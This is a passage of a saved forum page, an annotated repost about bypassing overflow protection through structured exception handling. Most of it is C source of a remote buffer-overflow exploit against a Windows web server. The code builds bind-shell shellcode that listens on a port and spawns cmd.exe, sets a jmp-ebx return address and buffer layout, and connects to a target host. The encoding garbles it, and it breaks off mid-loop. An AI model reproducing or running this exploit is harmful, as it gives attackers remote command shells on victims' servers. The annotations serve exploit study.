
📄 [转帖+注释]利用结构异常绕过溢出保护攻击.mht


                        main(int argc, char **argv)<BR>{ =
<BR>&nbsp;&nbsp;char=20
                        *server;<BR>&nbsp;&nbsp;char=20
                        =
*str=3D"\x1f\x90""LoadLibraryA""\x0""CreatePipe""\x0"&nbsp;&nbsp;<BR>&nbs=
p;=20
                        &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;=20
                        =
&nbsp;"CreateProcessA""\x0""CloseHandle""\x0"<BR>&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;=20
                        &nbsp;"PeekNamedPipe""\x0"<BR>&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp;=20
                        &nbsp;"ReadFile""\x0""WriteFile""\x0"<BR>&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;=20
                        &nbsp;"wsock32.dll""\x0""socket""\x0"<BR>&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;=20
                        &nbsp;"bind""\x0""listen""\x0"<BR>&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp;=20
                        &nbsp;"accept""\x0""send""\x0"<BR>&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp;=20
                        &nbsp;"recv""\x0""ioctlsocket""\x0"<BR>&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;=20
                        &nbsp;"closesocket""\x0"<BR>&nbsp; &nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp;=20
                        =
&nbsp;"cmd.exe""\x0""exit\x0d\x0a""\x0"<BR>&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; =
&nbsp;"strend";=20
                        =
//=CA=D7=C1=BD=B8=F6=D7=D6=BD=DA=CE=AA=B0=F3=B6=A8=B6=CB=BF=DA<BR><BR>/*&=
nbsp;&nbsp;shellcode=D3=C3=B5=BD=B5=C4api=C3=FB=B5=C8=D7=D6=B7=FB=B4=AE=20
                        */<BR><BR>&nbsp;&nbsp;char=20
                        =
*fnendstr=3D"\x90\x90\x90\x90\x90\x90\x90\x90\x90";<BR>&nbsp;&nbsp;char&n=
bsp;&nbsp;eipwinnt[]=3D"\x63\x0d\xfa\x7f";<BR><BR>/*&nbsp;=20
                        &nbsp;jmp ebx&nbsp;&nbsp;address */<BR>/*=20
                        =
<BR>win2000=B7=A2=C9=FA=D2=EC=B3=A3=CA=B1ebx=D6=B8=CF=F2=D2=EC=B3=A3=BD=E1=
=B9=B9=A3=AC<BR>winnt=20
                        =
=D3=D0=B5=C4=B0=E6=B1=BE=CA=C7esi,=D3=D0=B5=C4=B0=E6=B1=BE=CA=C7edi<BR>*/=
<BR>&nbsp;&nbsp;char&nbsp;&nbsp;JMPNEXTJMP[]=3D"\x90\x90\x90\x2d";<BR>/* =

                        <BR>0x2d&nbsp;&nbsp;sub eax,num32=20
                        =
<BR>=D3=C3=D3=DA=C6=BD=BA=E2=BA=F3=C3=E6=B5=C44=D7=D6=BD=DA=C8=CE=D2=E2=B4=
=FA=C2=EB=A3=AC=CA=B9=B5=C3=C1=AC=D0=F8=B8=B2=B8=C7=D2=E7=B3=F6=B5=E3=B5=C4=
=D5=E2=B6=CE=B4=FA=C2=EB=D6=B8=C1=EE=B5=C8=D0=A7=D3=DANOP<BR>*/<BR>&nbsp;=
&nbsp;char&nbsp;&nbsp;JMPSHELL[]=3D"\xe9\x40\xf0\xff\xff";&nbsp;&nbsp;//j=
mp=20
                        -0xfc0h<BR>&nbsp;&nbsp;char&nbsp; &nbsp;=20
                        buff[BUFFSIZE];<BR>&nbsp;&nbsp;char&nbsp; &nbsp; =

                        recvbuff[BUFFSIZE];<BR>&nbsp;&nbsp;char&nbsp; =
&nbsp;=20
                        =
shellcodebuff[0x1000];<BR>&nbsp;&nbsp;struct&nbsp;&nbsp;sockaddr_in=20
                        =
s_in2,s_in3;<BR>&nbsp;&nbsp;struct&nbsp;&nbsp;hostent=20
                        *he;<BR>&nbsp;&nbsp;char&nbsp; &nbsp;=20
                        =
*shellcodefnadd,*chkespadd;<BR>&nbsp;&nbsp;unsigned&nbsp;&nbsp;int=20
                        sendpacketlong;<BR>&nbsp;&nbsp;int=20
                        i,j,k;<BR>&nbsp;&nbsp;unsigned&nbsp;&nbsp;char=20
                        temp;<BR>&nbsp;&nbsp;int&nbsp;=20
                        &nbsp;&nbsp;&nbsp;fd;<BR>&nbsp;&nbsp;u_short=20
                        =
port,port1,shellcodeport;<BR>&nbsp;&nbsp;SOCKET&nbsp;&nbsp;d_ip;<BR>&nbsp=
;&nbsp;WSADATA=20
                        wsaData;<BR>&nbsp;&nbsp;int =
offset=3D0;<BR>&nbsp;&nbsp;int=20
                        OVERADD=3DRETEIPADDRESS;<BR>&nbsp;&nbsp;int=20
                        OVERADD2=3D0xfb8;<BR>&nbsp;&nbsp;int result=3D=20
                        WSAStartup(MAKEWORD(1, 1),=20
                        &amp;wsaData);<BR>&nbsp;&nbsp;if (result !=3D=20
                        0)<BR>&nbsp;&nbsp;{<BR>&nbsp; &nbsp; =
fprintf(stderr,=20
                        "Your computer was not connected "<BR>&nbsp; =
&nbsp; "to=20
                        the Internet at the time that "<BR>&nbsp; &nbsp; =
"this=20
                        program was launched, or you "<BR>&nbsp; &nbsp; =
"do not=20
                        have a 32-bit "<BR>&nbsp; &nbsp; "connection to =
the=20
                        Internet."<IMG=20
                        =
src=3D"http://25.20.176.12/bbs/images/smilies/wink.gif"=20
                        align=3DabsMiddle border=3D0>;<BR>&nbsp; &nbsp;=20
                        =
exit(1);<BR>&nbsp;&nbsp;}<BR>&nbsp;&nbsp;if(argc&gt;3)<BR>&nbsp;=20
                        &nbsp; =
port=3Datoi(argv[3]);<BR>&nbsp;&nbsp;else<BR>&nbsp;=20
                        &nbsp; port=3DWEBPORT;<BR>&nbsp;&nbsp;if(argc=20
                        &lt;2)<BR>&nbsp;&nbsp;{<BR>&nbsp; &nbsp; =
WSACleanup(=20
                        );<BR>&nbsp; &nbsp; fprintf(stderr, "\n except =
over=20
                        1.0."<IMG=20
                        =
src=3D"http://25.20.176.12/bbs/images/smilies/wink.gif"=20
                        align=3DabsMiddle border=3D0>;<BR>&nbsp; &nbsp;=20
                        fprintf(stderr, "\n copy by yuange =
2000.06.20."<IMG=20
                        =
src=3D"http://25.20.176.12/bbs/images/smilies/wink.gif"=20
                        align=3DabsMiddle border=3D0>;<BR>&nbsp; &nbsp;=20
                        fprintf(stderr, "\n welcome to my homepage <A=20
                        href=3D"http://yuange.yeah.net./"=20
                        =
target=3D_blank>http://yuange.yeah.net./</A>"<IMG=20
                        =
src=3D"http://25.20.176.12/bbs/images/smilies/wink.gif"=20
                        align=3DabsMiddle border=3D0>;<BR>&nbsp; &nbsp;=20
                        fprintf(stderr, "\n usage: %s &lt;server&gt; =
[shellport]=20
                        [webport] \n", argv[0]);<BR>&nbsp; &nbsp;=20
                        =
exit(1);<BR>&nbsp;&nbsp;}<BR>&nbsp;&nbsp;else<BR>&nbsp;=20
                        &nbsp; server =3D argv[1];<BR>&nbsp;&nbsp;d_ip =
=3D=20
                        =
inet_addr(server);<BR>&nbsp;&nbsp;if(d_ip=3D=3D-1)<BR>&nbsp;&nbsp;{<BR>&n=
bsp;=20
                        &nbsp; he =3D gethostbyname(server);<BR>&nbsp; =
&nbsp;=20
                        if(!he)<BR>&nbsp; &nbsp;&nbsp;&nbsp;{<BR>&nbsp;=20
                        &nbsp;&nbsp; &nbsp; WSACleanup( );<BR>&nbsp;=20
                        &nbsp;&nbsp; &nbsp; printf("\n Can't get the ip =
of %s=20
                        !\n",server);<BR>&nbsp; &nbsp;&nbsp; &nbsp;=20
                        exit(1);<BR>&nbsp; &nbsp;&nbsp;&nbsp;} =
<BR>&nbsp; &nbsp;=20
                        else<BR>&nbsp; &nbsp;&nbsp; =
&nbsp;memcpy(&amp;d_ip,=20
                        he-&gt;h_addr,=20
                        4);<BR>&nbsp;&nbsp;}<BR><BR>&nbsp;&nbsp;fd =3D=20
                        socket(AF_INET,=20
                        =
SOCK_STREAM,0);<BR>&nbsp;&nbsp;i=3D8000;<BR>&nbsp;&nbsp;setsockopt(fd,SOL=
_SOCKET,SO_RCVTIMEO,(const=20
                        char *)=20
                        =
&amp;i,sizeof(i));<BR>&nbsp;&nbsp;s_in3.sin_family =3D=20
                        AF_INET;<BR>&nbsp;&nbsp;s_in3.sin_port =3D=20
                        =
htons(port);<BR>&nbsp;&nbsp;s_in3.sin_addr.s_addr =3D=20
                        d_ip;<BR>&nbsp;&nbsp;printf("\n nuke ip: %s port =

                        =
%d",inet_ntoa(s_in3.sin_addr),htons(s_in3.sin_port));<BR>&nbsp;&nbsp;if(c=
onnect(fd,=20
                        (struct sockaddr *)&amp;s_in3, sizeof(struct=20
                        sockaddr_in))!=3D0)<BR>&nbsp;&nbsp;{<BR>&nbsp;=20
                        &nbsp;closesocket(fd);<BR>&nbsp; &nbsp;&nbsp;=20
                        &nbsp;WSACleanup( );<BR>&nbsp; &nbsp;&nbsp;=20
                        &nbsp;fprintf(stderr,"\n&nbsp;&nbsp;connect =
err."<IMG=20
                        =
src=3D"http://25.20.176.12/bbs/images/smilies/wink.gif"=20
                        align=3DabsMiddle border=3D0>;<BR>&nbsp; =
&nbsp;&nbsp;=20
                        =
&nbsp;exit(1);<BR>&nbsp;&nbsp;}<BR>&nbsp;&nbsp;_asm<BR>&nbsp;&nbsp;{<BR>&=
nbsp;=20
                        &nbsp; mov ESI,ESP<BR>&nbsp; &nbsp; cmp=20
                        =
ESI,ESP<BR>&nbsp;&nbsp;}<BR>&nbsp;&nbsp;_chkesp();<BR>&nbsp;&nbsp;chkespa=
dd=3D_chkesp;&nbsp;=20
                        =
&nbsp;//=C8=E7=B9=FB=B2=BB=CA=C7=D3=C3=CC=F8=D7=AA=B5=F7=D3=C3=A3=AC=D4=F2=
=D6=B1=BD=D3=BB=F1=B5=C3=B5=D8=D6=B7<BR>&nbsp;&nbsp;temp=3D*chkespadd;<BR=
>&nbsp;&nbsp;if(temp=3D=3D0xe9)<BR>&nbsp;&nbsp;{&nbsp;=20
                        &nbsp; =
//=C8=E7=B9=FB=CA=B9=D3=C3=CC=F8=D7=AA=B5=F7=D3=C3=A3=AC=BD=ABjmp=20
                        =
xxxx=D6=D0=B5=C4=B5=D8=D6=B7=CC=E1=C8=A1=B3=F6=C0=B4=A3=AC=BE=F8=B6=D4=B5=
=D8=D6=B7=CE=AAchkespadd+xxxx+4<BR>&nbsp;=20
                        &nbsp;&nbsp; &nbsp;++chkespadd;<BR>&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp; i=3D*(int*)chkespadd;<BR>&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;chkespadd+=3Di;<BR>&nbsp; &nbsp;&nbsp;=20
                        =
&nbsp;chkespadd+=3D4;<BR>&nbsp;&nbsp;}<BR>&nbsp;&nbsp;shellcodefnadd=3Dsh=
ellcodefnlock;&nbsp;=20
                        &nbsp;=20
                        =
//=CD=AC=C9=CF,=C1=BD=D6=D6=CC=D6=C2=DB=BB=F1=B5=C3shellcodefnlock=B5=D8=D6=
=B7=A3=AC=B4=CB=BA=AF=CA=FD=CE=AA=BD=E2=B1=E0=C2=EB<BR>&nbsp;&nbsp;temp=3D=
*shellcodefnadd;<BR>&nbsp;&nbsp;if(temp=3D=3D0xe9)=20
                        <BR>&nbsp;&nbsp;{<BR>&nbsp; &nbsp;&nbsp;=20
                        &nbsp;++shellcodefnadd;<BR>&nbsp; &nbsp;&nbsp;=20
                        &nbsp;k=3D*(int *)shellcodefnadd;<BR>&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;shellcodefnadd+=3Dk;<BR>&nbsp; =
&nbsp;&nbsp;=20
                        =
&nbsp;shellcodefnadd+=3D4;<BR>&nbsp;&nbsp;}<BR><BR>&nbsp;&nbsp;for(k=3D0;=
k&lt;=3D0x500;++k)<BR>&nbsp;&nbsp;{<BR>&nbsp;=20
                        &nbsp;&nbsp;=20
                        =
&nbsp;if(memcmp(shellcodefnadd+k,fnendstr,FNENDLONG)=3D=3D0)=20
                        break;&nbsp;=20
                        =
&nbsp;//=B6=A8=CE=BB=CE=D2=C3=C7=B6=A8=D2=E5=B5=C4=B1=EA=D6=BE=A3=AC=BE=CD=
=CA=C7=C4=C7=B8=F6=BF=AA=CD=B7=B5=C49=B8=F6nop<BR>&nbsp;&nbsp;}<BR><BR>&n=
bsp;&nbsp;memset(buff,NOPCODE,BUFFSIZE);=20
                        =
//buf=C7=E5=BF=D5<BR>&nbsp;&nbsp;memcpy(buff+OVERADD+NOPLONG,shellcodefna=
dd+k+4,0x80);//&nbsp;&nbsp;=D4=DA=BD=ABshellcodefnlock=BA=AF=CA=FD=B8=B4=D6=
=C6=B5=BDbuf+32=BF=AA=CA=BC=B4=A6<BR><BR><BR>&nbsp;&nbsp;/*&nbsp;=20
                        &nbsp;&nbsp;&nbsp;buff=BD=E1=B9=B9<BR>&nbsp;=20
                        =
&nbsp;&nbsp;&nbsp;[NNNNNNNN][NNNN][shellcodefnlock=20
                        =
NNNNNNN&nbsp;&nbsp;]<BR>&nbsp;&nbsp;32=B8=F6&nbsp;=20
                        =
&nbsp;&nbsp;&nbsp;4=B8=F6<BR>&nbsp;&nbsp;*/<BR>&nbsp;&nbsp;shellcodefnadd=
=3Dshellcodefn;&nbsp;=20
                        =
&nbsp;//=B6=A8=CE=BBshellcodefn=BA=AF=CA=FD=B5=D8=D6=B7=A3=AC=D2=B2=B7=D6=
=CE=AA=C1=BD=D6=D6=C7=E9=BF=F6=B7=D6=CE=F6<BR>&nbsp;&nbsp;temp=3D*shellco=
defnadd;<BR>&nbsp;&nbsp;if(temp=3D=3D0xe9)=20
                        <BR>&nbsp;&nbsp;{<BR>&nbsp;=20
                        &nbsp;&nbsp;&nbsp;++shellcodefnadd;<BR>&nbsp;=20
                        &nbsp;&nbsp;&nbsp;k=3D*(int =
*)shellcodefnadd;<BR>&nbsp;=20
                        &nbsp;&nbsp;&nbsp;shellcodefnadd+=3Dk;<BR>&nbsp; =

                        =
&nbsp;&nbsp;&nbsp;shellcodefnadd+=3D4;<BR>&nbsp;&nbsp;}<BR>&nbsp;&nbsp;fo=
r(k=3D0;k&lt;=3D0x1000;++k)<BR>&nbsp;&nbsp;{<BR>&nbsp;=20
                        &nbsp;=20
                        =
if(memcmp(shellcodefnadd+k,fnendstr,FNENDLONG)=3D=3D0)=20
                        =
break;//k=CE=AAshellcodefn=BA=AF=CA=FD=B5=C4=B4=F3=D0=A1<BR>&nbsp;&nbsp;}=
<BR><BR>memcpy(shellcodebuff,shellcodefnadd,k);<BR>&nbsp;&nbsp;cleanchkes=
p(shellcodefnadd,shellcodebuff,chkespadd,k);//=C7=E5=B3=FDshellcodefn=BA=AF=
=CA=FD=D6=D0=B5=C4chkesp()=B5=F7=D3=C3<BR><BR><BR>//=BD=AB=D0=E8=D2=AA=B5=
=F7=D3=C3=B5=C4=BA=AF=CA=FD=D7=D6=B7=FB=B4=AB=BF=BD=B1=B4=B5=BDshellcodeb=
uff=D6=D0<BR><BR>for(i=3D0;i&lt;0x400;++i){=20
                        <BR>if(memcmp(str+i,"strend",6)=3D=3D0)=20
                        =
break;<BR>&nbsp;&nbsp;}&nbsp;&nbsp;<BR>&nbsp;&nbsp;memcpy(shellcodebuff+k=
,str,i);<BR><BR>&nbsp;&nbsp;if(argc&gt;2)&nbsp;&nbsp;shellcodeport=3Datoi=
(argv[2]);<BR>&nbsp;&nbsp;else&nbsp;=20
                        &nbsp;&nbsp;=20
                        =
&nbsp;&nbsp;&nbsp;shellcodeport=3DSHELLPORT;<BR><BR>&nbsp;&nbsp;if(shellc=
odeport=3D=3D0)=20
                        =
shellcodeport=3DSHELLPORT;<BR>&nbsp;&nbsp;shellcodeport=3Dhtons(shellcode=
port);<BR>&nbsp;&nbsp;*(u_short=20
                        =
*)(shellcodebuff+k)=3Dshellcodeport;<BR>&nbsp;&nbsp;fprintf(stderr,"\n=20
                        shellport=20
                        =
%d",htons(shellcodeport));<BR><BR><BR>&nbsp;&nbsp;sendpacketlong=3Dk+i;<B=
R>&nbsp;&nbsp;for(k=3D0;k&lt;=3D0x200;++k){<BR>&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp;=20
                        =
&nbsp;if(memcmp(buff+OVERADD+NOPLONG+k,fnendstr,FNENDLONG)=3D=3D0)=20
                        break;<BR>&nbsp;&nbsp;}&nbsp;=20
                        =
&nbsp;//=B6=A8=CE=BB=C1=ED=CD=E2=B5=C4=C4=C7=B8=F6shellcodefnlock=BA=AF=CA=
=FD=BD=E1=CE=B2=B4=A6=B5=C49=B8=F6nop<BR><BR>&nbsp;&nbsp;for(i=3D0;i&lt;s=
endpacketlong;++i){<BR>&nbsp;=20
